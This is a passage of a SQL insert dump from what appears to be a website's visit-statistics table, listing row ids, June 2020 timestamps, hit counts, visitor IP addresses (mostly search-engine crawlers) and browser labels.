,0,'54.188.130.151','chrome'),(516340,1592872120,2,2,0,0,'66.249.70.72','chrome'),(516341,1592872314,1,1,0,0,'66.249.64.38','chrome'),(516342,1592873108,5,5,0,0,'66.249.70.70','chrome'),(516343,1592873164,2,2,0,0,'66.249.64.36','chrome'),(516344,1592873385,1,1,0,0,'178.154.200.222','other'),(516345,1592873697,1,1,0,0,'207.46.13.177','other'),(516346,1592873882,2,2,0,0,'66.249.70.69','chrome'),(516347,1592874258,2,2,0,0,'66.249.70.70','chrome'),(516348,1592874426,1,1,0,0,'66.249.70.72','chrome'),(516349,1592874766,1,1,0,0,'207.46.13.13','other'),(516350,1592875236,1,1,0,0,'158.69.38.243','chrome'),(516351,1592875310,1,1,0,0,'207.46.13.177','other'),(516352,1592875490,1,1,0,0,'66.249.70.70','chrome'),(516353,1592875970,1,1,0,0,'66.249.70.69','chrome'),(516354,1592875977,1,1,0,0,'66.249.64.38','chrome'),(516355,1592876405,1,1,0,0,'209.17.97.26','other'),(516356,1592877117,2,2,0,0,'66.249.64.33','chrome'),(516357,1592877198,1,1,0,0,'8.29.198.26','other'),(516358,1592877241,1,1,0,0,'8.29.198.27','other'),(516359,1592877387,8,8,0,0,'77.120.98.235','other'),(516360,1592877463,1,1,0,0,'178.154.200.236','other'),(516361,1592877536,1,1,0,0,'66.249.64.38','chrome'),(516362,1592878040,2,2,0,0,'66.249.70.72','chrome'),(516363,1592878055,1,1,0,0,'66.249.64.36','chrome'),(516364,1592878120,2,2,0,0,'66.249.70.69','chrome'),(516365,1592878165,1,1,0,0,'213.180.203.140','other'),(516366,1592878801,1,1,0,0,'157.55.39.193','other'),(516367,1592879415,2,2,0,0,'66.249.64.38','chrome'),(516368,1592879922,1,1,0,0,'157.55.39.193','other'),(516369,1592880074,1,1,0,0,'207.46.13.13','other'),(516370,1592880391,2,2,0,0,'66.249.70.70','chrome'),(516371,1592880397,3,3,0,0,'66.249.70.69','chrome'),(516372,1592880459,1,1,0,0,'194.61.24.94','other'),(516373,1592880670,8,8,0,0,'185.11.82.228','other'),(516374,1592880686,1,1,0,0,'66.249.70.72','chrome'),(516375,1592880703,1,1,0,0,'66.249.64.38','chrome'),(516376,1592881016,3,3,0,0,'95.217.224.32','other'),(516377,1592881365,1,1,0,0,'66.249.64.36','chrome'),(516378,1592881624,1,1,0,0,'54.153.62.208','chrome'),(516379,1592881685,1,1,0,0,'66.249.64.38','chrome'),(516380,1592881734,5,5,0,0,'66.249.70.70','chrome'),(516381,1592881773,1,1,0,0,'178.154.200.112','other'),(516382,1592882589,1,1,0,0,'157.55.39.52','other'),(516383,1592882869,1,1,0,0,'207.46.13.13','other'),(516384,1592883301,1,1,0,0,'66.249.70.70','chrome'),(516385,1592883388,1,1,0,0,'66.249.70.72','chrome'),(516386,1592883701,1,1,0,0,'157.55.39.193','other'),(516387,1592884370,1,1,0,0,'66.249.70.72','chrome'),(516388,1592884563,1,1,0,0,'213.180.203.16','other'),(516389,1592884773,2,2,0,0,'66.249.70.70','chrome'),(516390,1592884957,8,8,0,0,'77.120.98.235','other'),(516391,1592885104,2,2,0,0,'66.249.70.69','chrome'),(516392,1592885651,1,1,0,0,'59.153.145.241','chrome'),(516393,1592885711,1,1,0,0,'94.130.9.183','other'),(516394,1592885720,1,1,0,0,'66.249.70.70','chrome'),(516395,1592885952,2,2,0,0,'66.249.70.72','chrome'),(516396,1592886016,1,1,0,0,'178.154.200.155','other'),(516397,1592886999,1,1,0,0,'207.46.13.13','other'),(516398,1592887512,1,1,0,0,'66.249.64.36','chrome'),(516399,1592887731,4,4,0,0,'66.249.70.69','chrome'),(516400,1592887958,1,1,0,0,'66.249.70.72','chrome'),(516401,1592887960,1,1,0,0,'62.205.134.182','other'),(516402,1592888023,2,2,0,0,'8.29.198.26','other'),(516403,1592889367,1,1,0,0,'66.249.70.70','chrome'),(516404,1592890220,2,2,0,0,'66.249.64.33','chrome'),(516405,1592890386,1,1,0,0,'107.175.32.125','chrome'),(516406,1592890394,1,1,0,0,'134.202.64.2','chrome'),(516407,1592890621,1,1,0,0,'17.58.99.7','other'),(516408,1592890738,1,1,0,0,'66.249.64.38','chrome'),(516409,1592891394,2,2,0,0,'207.46.13.13','other'),(516410,1592891671,1,1,0,0,'66.249.70.70','chrome'),(516411,1592891737,1,1,0,0,'66.249.64.36','chrome'),(516412,1592891952,3,3,0,0,'66.249.70.69','chrome'),(516413,1592892432,1,1,0,0,'157.55.39.52','other'),(516414,1592892447,1,1,0,0,'207.46.13.177','other'),(516415,1592892495,1,1,0,0,'66.249.70.72','chrome'),(516416,1592892742,2,2,0,0,'66.249.70.70','chrome'),(516417,1592892937,1,1,0,0,'66.249.70.69','chrome'),(516418,1592892956,8,8,0,0,'77.120.98.235','other'),(516419,1592893109,1,1,0,0,'91.196.178.169','chrome'),(516420,1592893235,1,1,0,0,'66.249.64.33','chrome'),(516421,1592894220,1,1,0,0,'66.249.70.70','chrome'),(516422,1592894543,1,1,0,0,'66.249.64.33','chrome'),(516423,1592894965,3,3,0,0,'66.249.70.72','chrome'),(516424,1592895316,1,1,0,0,'66.249.70.70','chrome'),(516425,1592895726,1,1,0,0,'207.46.13.177','other'),(516426,1592896280,1,1,0,0,'178.154.200.92','other'),(516427,1592897160,2,2,0,0,'207.46.13.13','other'),(516428,1592897165,1,1,0,0,'157.55.39.193','other'),(516429,1592897169,1,1,0,0,'207.46.13.177','other'),(516430,1592897234,1,1,0,0,'95.134.8.14','chrome'),(516431,1592897606,1,1,0,0,'66.249.70.70','chrome'),(516432,1592897959,1,1,0,0,'131.220.6.152','chrome'),(516433,1592898055,1,1,0,0,'193.106.30.99','chrome'),(516434,1592898615,1,1,0,0,'157.55.39.193','other'),(516435,1592898678,1,1,0,0,'207.46.13.177','other'),(516436,1592898857,1,1,0,0,'8.29.198.26','other'),(516437,1592898897,1,1,0,0,'8.29.198.27','other'),(516438,1592899961,1,1,0,0,'207.46.13.177','other'),(516439,1592901364,1,1,0,0,'66.249.70.69','chrome'),(516440,1592901398,1,1,0,0,'213.180.203.84','other'),(516441,1592901502,1,1,0,0,'66.249.64.36','chrome'),(516442,1592902116,1,1,0,0,'66.249.64.38','chrome'),(516443,1592902328,8,8,0,0,'77.120.98.235','other'),(516444,1592902423,1,1,0,0,'5.189.178.48','other'),(516445,1592902506,1,1,0,0,'178.133.209.214','chrome'),(516446,1592902948,2,2,0,0,'66.249.70.70','chrome'),(516447,1592903479,1,1,0,0,'66.249.70.69','chrome'),(516448,1592904022,56,56,0,0,'62.210.78.76','other'),(516449,1592904029,1,1,0,0,'178.154.200.92','other'),(516450,1592904220,1,1,0,0,'66.249.64.36','chrome'),(516451,1592904390,1,1,0,0,'173.252.111.5','other'),(516452,1592904391,1,1,0,0,'173.252.111.4','other'),(516454,1592904744,1,1,0,0,'37.54.18.5','chrome'),(516455,1592904847,2,2,0,0,'66.249.70.69','chrome'),(516456,1592904943,3,3,0,0,'66.249.70.72','chrome'),(516457,1592905021,1,1,0,0,'178.154.200.92','other'),(516458,1592905218,1,1,0,0,'213.180.203.16','other'),(516459,1592905391,1,1,0,0,'91.196.178.137','chrome'),(516460,1592905640,2,2,0,0,'66.249.70.70','chrome'),(516461,1592905645,1,1,0,0,'66.249.64.36','chrome'),(516462,1592905686,1,1,0,0,'207.46.13.177','other'),(516463,1592905755,1,1,0,0,'66.249.64.33','chrome'),(516464,1592905880,1,1,0,0,'66.249.64.38','chrome'),(516465,1592906041,2,2,0,0,'66.249.70.69','chrome'),(516466,1592906044,1,0,1,0,'66.249.70.72',''),(516467,1592906499,1,1,0,0,'3.22.186.240','chrome'),(516468,1592906944,1,1,0,0,'91.196.178.186','chrome'),(516469,1592907008,1,1,0,0,'91.196.178.21','chrome'),(516470,1592907370,2,2,0,0,'66.249.70.70','chrome'),(516471,1592907436,1,1,0,0,'66.249.70.72','chrome'),(516472,1592907510,1,1,0,0,'66.249.70.69','chrome'),(516473,1592907975,1,1,0,0,'66.249.64.38','chrome'),(516474,1592908598,1,1,0,0,'66.249.70.69','chrome'),(516475,1592909094,1,1,0,0,'91.196.179.138','firefox'),(516476,1592909256,1,1,0,0,'66.249.70.72','chrome'),(516477,1592909436,1,1,0,0,'91.196.177.46','chrome'),(516478,1592909683,1,1,0,0,'8.29.198.25','other'),(516479,1592909692,8,8,0,0,'185.11.82.228','other'),(516480,1592909726,1,1,0,0,'8.29.198.26','other'),(516481,1592909822,1,1,0,0,'91.196.178.161','chrome'),(516482,1592909899,2,2,0,0,'66.249.70.69','chrome'),(516483,1592909927,1,1,0,0,'207.46.13.177','other'),(516484,1592910056,1,1,0,0,'66.249.64.38','chrome'),(516485,1592910058,1,1,0,0,'109.74.154.72','chrome'),(516486,1592910263,1,1,0,0,'46.211.34.201','other'),(516487,1592911187,1,1,0,0,'66.249.64.36','chrome'),(516488,1592911214,1,1,0,0,'192.35.168.144','other'),(516489,1592911903,1,1,0,0,'31.202.101.40','chrome'),(516490,1592911955,1,1,0,0,'77.111.244.49','chrome'),(516491,1592911981,2,2,0,0,'157.55.39.193','other'),(516492,1592912349,1,1,0,0,'66.249.64.38','chrome'),(516493,1592912439,1,1,0,0,'192.35.168.176','other'),(516494,1592912523,1,1,0,0,'66.249.70.70','chrome'),(516495,1592913434,1,1,0,0,'66.249.70.70','chrome'),(516496,1592914146,1,1,0,0,'66.249.70.72','chrome'),(516497,1592914285,1,1,0,0,'77.111.244.49','chrome'),(516498,1592914623,2,2,0,0,'157.55.39.193','other'),(516499,1592915460,2,2,0,0,'207.46.13.13','other'),(516500,1592915730,2,2,0,0,'143.215.247.111','chrome'),(516501,1592916238,1,1,0,0,'157.55.39.193','other'),(516502,1592916316,1,1,0,0,'66.249.70.69','chrome'),(516503,1592916665,1,1,0,0,'193.19.152.90','chrome'),(516504,1592916675,1,1,0,0,'66.249.64.38','chrome'),(516505,1592916804,1,1,0,0,'66.249.70.70','chrome'),(516506,1592916967,1,1,0,0,'37.53.89.92','chrome'),(516507,1592917406,1,1,0,0,'88.99.137.13','chrome'),(516508,1592918768,8,8,0,0,'77.120.98.235','other'),(516509,1592918828,1,1,0,0,'157.55.39.193','other'),(516510,1592919066,1,1,0,0,'66.249.70.69','chrome'),(516511,1592919727,2,2,0,0,'66.249.70.70','chrome'),(516512,1592919836,1,1,0,0,'66.249.64.36','chrome'),(516513,1592920047,1,1,0,0,'66.249.70.69','chrome'),(516514,1592920515,1,1,0,0,'8.29.198.25','other'),(516515,1592920559,1,1,0,0,'8.29.198.26','other'),(516516,1592921458,1,1,0,0,'66.249.70.72','chrome'),(516517,1592921783,1,0,1,0,'66.249.70.70',''),(516518,1592921869,1,1,0,0,'66.249.64.33','chrome'),(516519,1592923257,1,1,0,0,'66.249.64.38','chrome'),(516520,1592923759,1,1,0,0,'66.249.70.70','chrome'),(516521,1592924130,1,1,0,0,'66.249.64.36','chrome'),(516522,1592924670,1,1,0,0,'207.46.13.13','other'),(516523,1592924741,1,1,0,0,'176.105.196.25','chrome'),(516524,1592924776,1,1,0,0,'66.249.70.70','chrome'),(516525,1592925736,1,1,0,0,'66.249.64.33','chrome'),(516526,1592925815,1,1,0,0,'66.249.64.36','chrome'),(516527,1592925919,1,1,0,0,'192.35.168.64','other'),(516528,1592926375,1,1,0,0,'66.249.70.72','chrome'),(516529,1592926758,1,1,0,0,'66.249.64.36','chrome'),(516530,1592926860,3,3,0,0,'66.249.70.70','chrome'),(516531,1592927089,3,3,0,0,'66.249.70.69','chrome'),(516532,1592927210,1,1,0,0,'207.46.13.13','other'),(516533,1592927242,1,1,0,0,'178.154.200.222','other'),(516534,1592928521,1,1,0,0,'94.23.182.97','chrome'),(516535,1592929705,6,6,0,0,'66.249.70.70','chrome'),(516536,1592929996,2,2,0,0,'66.249.64.38','chrome'),(516537,1592930133,4,4,0,0,'66.249.70.69','chrome'),(516538,1592930711,2,2,0,0,'66.249.70.70','chrome'),(516539,1592930927,1,1,0,0,'66.249.64.38','chrome'),(516540,1592930984,1,1,0,0,'66.249.70.72','chrome'),(516541,1592931094,1,1,0,0,'45.133.170.76','chrome'),(516542,1592931346,2,2,0,0,'8.29.198.27','other'),(516543,1592931635,1,1,0,0,'66.249.70.69','chrome'),(516544,1592931795,1,1,0,0,'66.249.70.70','chrome'),(516545,1592932029,2,2,0,0,'66.249.70.72','chrome'),(516546,1592932227,1,1,0,0,'135.181.30.139','chrome'),(516547,1592932229,1,1,0,0,'66.249.64.38','chrome'),(516548,1592933137,3,3,0,0,'66.249.70.70','chrome'),(516549,1592933548,1,1,0,0,'43.239.160.130','chrome'),(516550,1592933725,1,1,0,0,'66.249.70.72','chrome'),(516551,1592933845,1,1,0,0,'66.249.70.69','chrome'),(516552,1592934102,1,1,0,0,'66.249.70.70','chrome'),(516553,1592934291,2,2,0,0,'149.202.78.80','firefox'),(516554,1592934360,1,1,0,0,'157.55.39.193','other'),(516555,1592934377,2,2,0,0,'66.249.64.33','chrome'),(516556,1592934572,1,1,0,0,'148.251.9.48','chrome'),(516557,1592934679,1,1,0,0,'66.249.64.36','chrome'),(516558,1592935519,2,2,0,0,'66.249.70.70','chrome'),(516559,1592935531,8,8,0,0,'77.120.98.235','other'),(516560,1592935679,2,2,0,0,'66.249.70.72','chrome'),(516561,1592935867,1,1,0,0,'66.249.64.38','chrome'),(516562,1592935944,1,1,0,0,'59.153.145.242','chrome'),(516563,1592936079,1,1,0,0,'207.46.13.13','other'),(516564,1592936119,1,1,0,0,'66.249.70.69','chrome'),(516565,1592937352,4,4,0,0,'66.249.70.69','chrome'),(516566,1592937398,3,3,0,0,'66.249.70.70','chrome'),(516567,1592937942,1,1,0,0,'207.46.13.13','other'),(516568,1592937982,1,1,0,0,'66.249.70.72','chrome'),(516569,1592938740,1,1,0,0,'178.154.200.222','other'),(516570,1592938906,4,4,0,0,'66.249.70.72','chrome'),(516571,1592939414,1,1,0,0,'88.155.177.117','chrome'),(516572,1592939491,1,1,0,0,'66.249.70.69','chrome'),(516573,1592940302,1,1,0,0,'213.180.203.16','other'),(516574,1592940764,1,1,0,0,'207.46.13.13','other'),(516575,1592941287,1,1,0,0,'91.196.178.21','chrome'),(516576,1592941415,1,0,1,0,'66.249.70.69',''),(516577,1592942117,2,2,0,0,'66.249.70.72','chrome'),(516578,1592942180,1,1,0,0,'8.29.198.27','other'),(516579,1592942211,1,1,0,0,'8.29.198.25','other'),(516580,1592942303,1,1,0,0,'207.46.13.13','other'),(516581,1592942523,1,1,0,0,'66.249.70.70','chrome'),(516582,1592942546,1,1,0,0,'66.249.70.69','chrome'),(516583,1592943534,2,2,0,0,'66.249.64.38','chrome'),(516584,1592943853,4,4,0,0,'66.249.70.70','chrome'),(516585,1592944185,3,3,0,0,'66.249.70.69','chrome'),(516586,1592944573,1,1,0,0,'66.249.70.72','chrome'),(516587,1592944659,1,1,0,0,'66.249.64.38','chrome'),(516588,1592945504,1,1,0,0,'66.249.70.69','chrome'),(516589,1592945563,1,1,0,0,'178.154.200.97','other'),(516590,1592945858,1,1,0,0,'66.249.70.70','chrome'),(516591,1592945949,1,1,0,0,'66.249.64.33','chrome'),(516592,1592945987,1,1,0,0,'91.196.178.156','chrome'),(516593,1592946041,2,2,0,0,'66.249.64.38','chrome'),(516594,1592946260,1,1,0,0,'178.154.200.220','other'),(516595,1592946357,1,1,0,0,'212.47.248.107','chrome'),(516596,1592946730,1,1,0,0,'171.247.194.122','other'),(516597,1592947595,2,2,0,0,'66.249.70.70','chrome'),(516598,1592948057,1,1,0,0,'66.249.64.38','chrome'),(516599,1592948068,1,1,0,0,'66.249.70.69','chrome'),(516600,1592949468,2,2,0,0,'66.249.70.70','chrome'),(516601,1592949924,1,1,0,0,'66.249.64.36','chrome'),(516602,1592950861,1,1,0,0,'66.249.64.33','chrome'),(516603,1592950937,8,8,0,0,'77.120.98.235','other'),(516604,1592950988,1,1,0,0,'78.46.149.254','other'),(516605,1592951273,4,4,0,0,'66.249.70.72','chrome'),(516606,1592951369,1,1,0,0,'66.249.70.70','chrome'),(516607,1592951420,1,1,0,0,'66.249.70.69','chrome'),(516608,1592952958,1,1,0,0,'66.249.70.72','chrome'),(516609,1592953009,2,2,0,0,'8.29.198.27','other'),(516610,1592953604,1,1,0,0,'157.55.39.193','other'),(516611,1592953684,1,1,0,0,'46.4.33.48','other'),(516612,1592954048,1,1,0,0,'66.249.70.69','chrome'),(516613,1592954139,1,1,0,0,'66.249.64.33','chrome'),(516614,1592954527,1,1,0,0,'207.46.13.69','other'),(516615,1592955881,8,8,0,0,'185.11.82.228','other'),(516616,1592955990,1,1,0,0,'66.249.64.36','chrome'),(516617,1592956224,1,1,0,0,'66.249.70.70','chrome'),(516618,1592956506,1,1,0,0,'62.205.134.182','other'),(516619,1592957230,8,8,0,0,'185.11.82.228','other'),(516620,1592957439,1,1,0,0,'207.46.13.69','other'),(516621,1592958286,1,1,0,0,'66.249.64.38','chrome'),(516622,1592958412,1,1,0,0,'66.249.70.72','chrome'),(516623,1592958501,8,8,0,0,'185.11.82.228','other'),(516624,1592958863,1,1,0,0,'66.249.70.70','chrome'),(516625,1592958948,1,1,0,0,'66.249.70.69','chrome'),(516626,1592959302,1,1,0,0,'66.249.64.33','chrome'),(516627,1592959508,1,1,0,0,'66.249.70.72','chrome'),(516628,1592959795,8,8,0,0,'185.11.82.228','other'),(516629,1592960022,1,1,0,0,'102.165.5.120','chrome'),(516630,1592960079,1,1,0,0,'66.249.70.69','chrome'),(516631,1592960917,1,1,0,0,'194.61.24.94','other'),(516632,1592961079,1,1,0,0,'59.153.145.233','chrome'),(516633,1592961104,8,8,0,0,'185.11.82.228','other'),(516634,1592961442,1,1,0,0,'91.209.11.236','other'),(516635,1592961587,3,3,0,0,'66.249.70.70','chrome'),(516636,1592962446,8,8,0,0,'185.11.82.228','other'),(516637,1592962758,1,1,0,0,'66.249.70.69','chrome'),(516638,1592963788,8,8,0,0,'185.11.82.228','other'),(516639,1592963834,1,1,0,0,'8.29.198.27','other'),(516640,1592963879,1,1,0,0,'8.29.198.26','other'),(516641,1592964186,1,1,0,0,'66.249.70.70','chrome'),(516642,1592964191,1,1,0,0,'66.249.70.69','chrome'),(516643,1592965097,8,8,0,0,'185.11.82.228','other'),(516644,1592965973,1,1,0,0,'66.249.70.69','chrome'),(516645,1592966404,8,8,0,0,'185.11.82.228','other'),(516646,1592966979,1,1,0,0,'66.249.64.38','chrome'),(516647,1592967191,1,1,0,0,'66.249.70.72','chrome'),(516648,1592967213,1,1,0,0,'213.180.203.16','chrome'),(516649,1592967394,1,1,0,0,'66.249.64.33','chrome'),(516650,1592967605,2,2,0,0,'66.249.70.70','chrome'),(516651,1592967804,8,8,0,0,'185.11.82.228','other'),(516652,1592968286,1,1,0,0,'66.249.70.69','chrome'),(516653,1592968564,1,1,0,0,'17.58.99.7','other'),(516654,1592969184,8,8,0,0,'185.11.82.228','other'),(516655,1592969930,2,2,0,0,'162.241.70.34','other'),(516656,1592970413,8,8,0,0,'77.120.98.235','other'),(516657,1592970548,8,8,0,0,'185.11.82.228','other'),(516658,1592970559,1,1,0,0,'66.249.70.69','chrome'),(516659,1592971480,2,2,0,0,'66.249.70.69','chrome'),(516660,1592971835,2,2,0,0,'66.249.70.70','chrome'),(516661,1592971854,1,1,0,0,'178.154.200.222','other'),(516662,1592971953,8,8,0,0,'185.11.82.228','other'),(516663,1592973341,8,8,0,0,'185.11.82.228','other'),(516664,1592973418,1,1,0,0,'178.154.200.222','other'),(516665,1592973472,1,1,0,0,'66.249.64.38','chrome'),(516666,1592973501,1,1,0,0,'17.58.99.7','other'),(516667,1592973695,1,1,0,0,'157.55.39.193','other'),(516668,1592973812,1,1,0,0,'157.55.39.180','other'),(516669,1592974400,1,1,0,0,'62.205.134.182','other'),(516670,1592974660,1,1,0,0,'8.29.198.26','other'),(516671,1592974709,1,1,0,0,'8.29.198.27','other'),(516672,1592974773,8,8,0,0,'185.11.82.228','other'),(516673,1592974961,1,1,0,0,'91.209.11.236','other'),(516674,1592975557,1,1,0,0,'66.249.70.72','chrome'),(516675,1592976169,1,1,0,0,'157.55.39.180','other'),(516676,1592976230,8,8,0,0,'185.11.82.228','other'),(516677,1592976468,1,1,0,0,'91.196.178.89','chrome'),(516678,1592976699,2,2,0,0,'66.249.70.70','chrome'),(516679,1592977649,8,8,0,0,'185.11.82.228','other'),(516680,1592978053,1,1,0,0,'66.249.70.70','chrome'),(516681,1592978204,1,1,0,0,'178.154.200.222','other'),(516682,1592978292,2,2,0,0,'66.249.70.72','chrome'),(516683,1592978344,1,1,0,0,'202.133.247.208','other'),(516684,1592978721,2,2,0,0,'66.249.70.69','chrome'),(516685,1592979081,8,8,0,0,'185.11.82.228','other'),(516686,1592979372,3,3,0,0,'66.249.70.72','chrome'),(516687,1592979570,1,1,0,0,'157.55.39.180','other'),(516688,1592979641,1,1,0,0,'2.47.39.219','other'),(516689,1592979657,2,2,0,0,'66.249.70.70','chrome'),(516690,1592980001,1,1,0,0,'213.180.203.16','other'),(516691,1592980372,1,1,0,0,'17.58.99.7','other'),(516692,1592980460,8,8,0,0,'185.11.82.228','other'),(516693,1592981226,1,1,0,0,'157.55.39.193','other'),(516694,1592981394,1,1,0,0,'66.249.70.72','chrome'),(516695,1592981863,8,8,0,0,'185.11.82.228','other'),(516696,1592982022,1,1,0,0,'66.249.70.70','chrome'),(516697,1592982235,1,1,0,0,'31.13.127.11','other'),(516698,1592982236,1,1,0,0,'31.13.127.18','other'),(516699,1592982256,1,1,0,0,'66.249.70.69','chrome'),(516700,1592983169,4,4,0,0,'66.249.70.69','chrome'),(516701,1592983348,2,2,0,0,'157.55.39.193','other'),(516702,1592983349,8,8,0,0,'185.11.82.228','other'),(516703,1592983400,2,2,0,0,'157.55.39.180','other'),(516704,1592983889,2,2,0,0,'66.249.70.70','chrome'),(516705,1592984076,1,1,0,0,'66.249.70.72','chrome'),(516706,1592984172,1,1,0,0,'131.220.6.152','chrome'),(516707,1592984188,1,1,0,0,'91.196.178.79','chrome'),(516708,1592984579,1,1,0,0,'66.249.70.69','chrome'),(516709,1592984812,8,8,0,0,'185.11.82.228','other'),(516710,1592984876,1,1,0,0,'43.239.160.130','chrome'),(516711,1592985096,1,1,0,0,'31.13.127.14','other'),(516712,1592985312,1,1,0,0,'66.249.70.72','chrome'),(516713,1592985488,2,2,0,0,'8.29.198.25','other'),(516714,1592985705,1,1,0,0,'66.249.70.69','chrome'),(516715,1592985842,1,1,0,0,'66.249.70.70','chrome'),(516716,1592985905,1,1,0,0,'46.219.205.214','chrome'),(516717,1592986315,8,8,0,0,'185.11.82.228','other'),(516718,1592986801,3,3,0,0,'66.249.70.70','chrome'),(516719,1592987286,1,1,0,0,'66.249.70.69','chrome'),(516720,1592987442,1,1,0,0,'66.249.70.72','chrome'),(516721,1592987778,1,1,0,0,'91.209.11.236','other'),(516722,1592987805,8,8,0,0,'185.11.82.228','other'),(516723,1592987972,1,1,0,0,'66.249.64.36','chrome'),(516724,1592988257,1,1,0,0,'66.249.64.33','chrome'),(516725,1592988273,1,1,0,0,'91.196.178.169','firefox'),(516726,1592988309,2,2,0,0,'66.249.70.69','chrome'),(516727,1592988469,2,2,0,0,'17.58.99.7','other'),(516728,1592988800,1,1,0,0,'66.249.70.72','chrome'),(516729,1592988898,1,1,0,0,'66.249.64.36','chrome'),(516730,1592989074,1,1,0,0,'66.249.70.70','chrome'),(516731,1592989363,8,8,0,0,'185.11.82.228','other'),(516732,1592989394,1,1,0,0,'91.196.178.21','chrome'),(516733,1592989452,2,2,0,0,'92.112.230.234','chrome'),(516734,1592990181,1,1,0,0,'185.236.210.226','chrome'),(516735,1592990273,1,1,0,0,'66.249.70.70','chrome'),(516736,1592990888,8,8,0,0,'185.11.82.228','other'),(516737,1592991027,1,1,0,0,'213.180.203.16','other'),(516738,1592991718,1,1,0,0,'66.249.70.70','chrome'),(516739,1592992124,1,1,0,0,'66.249.64.36','chrome'),(516740,1592992217,1,1,0,0,'173.252.111.13','other'),(516741,1592992218,1,1,0,0,'173.252.111.15','other'),(516743,1592992271,1,1,0,0,'37.53.228.153','chrome'),(516744,1592992379,8,8,0,0,'185.11.82.228','other'),(516745,1592992509,1,1,0,0,'91.196.178.167','chrome'),(516746,1592992685,1,1,0,0,'66.249.70.72','chrome'),(516747,1592992934,1,1,0,0,'178.154.200.222','other'),(516748,1592993541,1,0,1,0,'66.249.70.69',''),(516749,1592993824,8,8,0,0,'185.11.82.228','other'),(516750,1592993945,1,1,0,0,'17.58.99.7','other'),(516751,1592994221,2,2,0,0,'66.249.70.70','chrome'),(516752,1592994267,1,1,0,0,'18.221.156.135','chrome'),(516753,1592994280,1,1,0,0,'209.17.97.122','other'),(516754,1592994687,4,4,0,0,'54.166.162.22','other'),(516755,1592994690,3,3,0,0,'174.129.179.50','other'),(516759,1592994693,3,3,0,0,'18.204.212.232','other'),(516762,1592994694,1,1,0,0,'18.206.237.20','other'),(516763,1592995016,2,2,0,0,'66.249.70.72','chrome'),(516764,1592995350,8,8,0,0,'185.11.82.228','other'),(516765,1592996209,1,1,0,0,'66.249.70.69','chrome'),(516766,1592996311,2,2,0,0,'8.29.198.25','other'),(516767,1592996317,1,1,0,0,'17.58.99.7','other'),(516768,1592996443,1,1,0,0,'66.249.70.70','chrome'),(516769,1592996478,1,1,0,0,'66.249.64.36','chrome'),(516770,1592996879,8,8,0,0,'185.11.82.228','other'),(516771,1592996929,1,1,0,0,'109.74.154.72','chrome'),(516772,1592997100,2,2,0,0,'95.213.141.126','opera'),(516773,1592997477,1,1,0,0,'66.249.70.69','chrome'),(516774,1592997882,2,2,0,0,'66.249.70.72','chrome'),(516775,1592998499,1,1,0,0,'17.58.99.7','other'),(516776,1592998657,8,8,0,0,'77.120.98.235','other'),(516777,1592998666,1,1,0,0,'91.196.178.84','firefox'),(516778,1592998728,8,8,0,0,'185.11.82.228','other'),(516779,1592999267,1,1,0,0,'95.216.96.245','other'),(516780,1592999299,2,2,0,0,'66.249.70.72','chrome'),(516781,1593000115,1,1,0,0,'17.58.99.7','other'),(516782,1593000742,8,8,0,0,'185.11.82.228','other'),(516783,1593001109,1,1,0,0,'95.216.96.245','other'),(516784,1593001409,1,1,0,0,'91.196.178.167','chrome'),(516785,1593002045,1,1,0,0,'95.216.96.245','other'),(516786,1593002768,8,8,0,0,'185.11.82.228','other'),(516787,1593002903,1,1,0,0,'66.249.70.69','chrome'),(516788,1593003434,1,1,0,0,'17.58.99.7','other'),(516789,1593003449,2,2,0,0,'77.222.145.82','other'),(516790,1593003628,1,1,0,0,'66.249.70.72','chrome'),(516791,1593004182,1,1,0,0,'178.92.153.28','chrome'),(516792,1593004492,1,1,0,0,'157.55.39.180','other'),(516793,1593004590,1,1,0,0,'91.196.178.124','chrome'),(516794,1593004773,8,8,0,0,'185.11.82.228','other'),(516795,1593005648,1,1,0,0,'66.249.70.70','chrome'),(516796,1593006351,1,1,0,0,'66.249.70.69','chrome'),(516797,1593006676,1,1,0,0,'66.249.70.72','chrome'),(516798,1593006760,8,8,0,0,'185.11.82.228','other'),(516799,1593007135,1,1,0,0,'213.180.203.16','other'),(516800,1593007142,2,2,0,0,'8.29.198.25','other'),(516801,1593008023,1,1,0,0,'66.249.70.70','chrome'),(516802,1593008164,1,1,0,0,'17.58.99.7','other'),(516803,1593008415,1,1,0,0,'188.68.240.242','chrome'),(516804,1593008543,1,1,0,0,'66.249.70.69','chrome'),(516805,1593008880,8,8,0,0,'185.11.82.228','other'),(516806,1593009621,1,1,0,0,'66.249.70.72','chrome'),(516807,1593010902,8,8,0,0,'185.11.82.228','other'),(516808,1593011092,1,1,0,0,'66.249.70.70','chrome'),(516809,1593011390,2,2,0,0,'31.13.127.20','other'),(516810,1593011509,1,1,0,0,'193.106.30.99','firefox'),(516811,1593011782,1,1,0,0,'66.249.70.69','chrome'),(516812,1593012027,1,1,0,0,'66.249.64.33','chrome'),(516813,1593012770,1,1,0,0,'66.249.70.72','chrome'),(516814,1593012865,8,8,0,0,'185.11.82.228','other'),(516815,1593013021,1,1,0,0,'66.249.64.36','chrome'),(516816,1593013952,1,1,0,0,'66.249.64.38','chrome'),(516817,1593014822,8,8,0,0,'185.11.82.228','other'),(516818,1593015465,1,1,0,0,'66.249.70.70','chrome'),(516819,1593015539,1,1,0,0,'66.249.70.72','chrome'),(516820,1593015545,2,2,0,0,'66.249.70.69','chrome'),(516821,1593016745,2,2,0,0,'66.249.70.72','chrome'),(516822,1593016886,8,8,0,0,'185.11.82.228','other'),(516823,1593017230,1,1,0,0,'66.249.64.36','chrome'),(516824,1593017430,1,1,0,0,'178.213.186.28','chrome'),(516825,1593017561,1,1,0,0,'66.249.70.70','chrome'),(516826,1593017966,1,1,0,0,'8.29.198.26','other'),(516827,1593018024,1,1,0,0,'8.29.198.27','other'),(516828,1593018482,1,1,0,0,'66.249.70.72','chrome'),(516829,1593018896,1,1,0,0,'148.251.8.250','other'),(516830,1593018976,8,8,0,0,'185.11.82.228','other'),(516831,1593019235,2,2,0,0,'66.249.70.69','chrome'),(516832,1593020412,1,1,0,0,'91.209.11.236','other'),(516833,1593020506,1,1,0,0,'82.118.22.4','firefox'),(516834,1593020885,8,8,0,0,'185.11.82.228','other'),(516835,1593020954,1,1,0,0,'66.249.70.36','chrome'),(516836,1593021148,2,2,0,0,'66.249.64.23','chrome'),(516837,1593021211,1,1,0,0,'66.249.64.25','chrome'),(516838,1593021736,1,1,0,0,'66.249.64.24','chrome'),(516839,1593022929,8,8,0,0,'185.11.82.228','other'),(516840,1593023202,1,1,0,0,'88.155.74.228','chrome'),(516841,1593023319,1,1,0,0,'66.249.70.72','chrome'),(516842,1593023405,1,1,0,0,'66.249.70.69','chrome'),(516843,1593023882,1,1,0